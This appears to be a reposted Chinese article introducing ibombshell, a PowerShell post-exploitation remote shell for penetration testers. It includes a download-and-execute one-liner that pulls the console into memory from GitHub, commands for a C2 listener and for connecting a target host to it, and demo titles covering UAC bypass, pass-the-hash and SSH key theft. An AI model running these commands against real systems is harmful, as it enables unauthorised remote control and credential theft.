ibombshell:一款功能強大的動態遠程Shell工具

今天給大家介紹的是一款名叫ibombshell的動態遠程Shell工具,該工具基於Powershell開發,可在後滲透利用階段發揮其作用。

ibombshell:一款功能強大的動態遠程Shell工具

ibombshell介紹

ibombshell本身是一個shell,但是它能夠直接下載進目標設備的內存中,並給研究人員提供大量的滲透測試功能,這些功能是直接加載進內存的,並以Powershell函數的形式提供給測試人員,也就是說,這些功能"走到哪裡"都能夠直接執行。

除此之外,ibombshell還提供了一種名叫Silently的二級執行模式,所以滲透測試人員可以執行一個ibombshell實例(名叫warrior),被入侵的主機將會通過HTTP鏈接到一個C2控制面板,因此測試人員就可以通過控制warrior來實現對目標主機的滲透。

工具要求

為了發揮ibombshell的完整功能,首先要求的是Powershell 3.0及以上版本,如果你用的不是Windows,你可以閱讀下面這篇文章來實現在任意系統上使用Powershell。

https://github.com/PowerShell/PowerShell

如果你想以Silently模式運行ibombshell,你還需要Python 3.6以及其他的一些Python庫,安裝命令如下:

cd ibombshell\\ c2/
pip install -r requirements.txt

工具使用

ibombshell主要有兩種執行模式:

第一種名叫"ibombshell everywhere"模式,你可以直接在Powershell上加載ibombshell:

iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')

然後運行下載下來的ibombshell控制檯:

console

第二種名叫"ibombshell silently"模式,當前版本允許我們運行ibombshell控制檯並通過C2控制面板來實現遠程訪問。首先你需要在Powershell中啟動控制檯進程:

iex (new-objectnet.webclient).downloadstring('https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console')

設置好ibombshell的C2路徑:

python3 ibombshell.py

創建一個監聽器,並與warrior相連:

iBombShell>load modules/listener.py
[+]Loading module...
[+]Module loaded!
iBombShell[modules/listener.py]>run

默認的監聽端口為8080,然後在主機上以Silently模式啟動控制檯,並獲取到遠程控制權限:

console-Silently -uriConsole http://[ip or domain]:[port] 

ibombshell C2機制

ibombshell控制面板的基本運行機制如下圖所示:

ibombshell:一款功能強大的動態遠程Shell工具

Docker

我們還為用戶提供了專門的Docker容器,你可以使用下列命令來使用它:

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

工具使用演示

iBombShell:PoC Warrior + Bypass UAC + Pass the hash

iBombShell:macOS

ibombshell:Extracting Private SSH Keys on Windows 10

iBombShell:PoC savefunctions

稿源:FreeBuf.COM


分享到:


相關文章: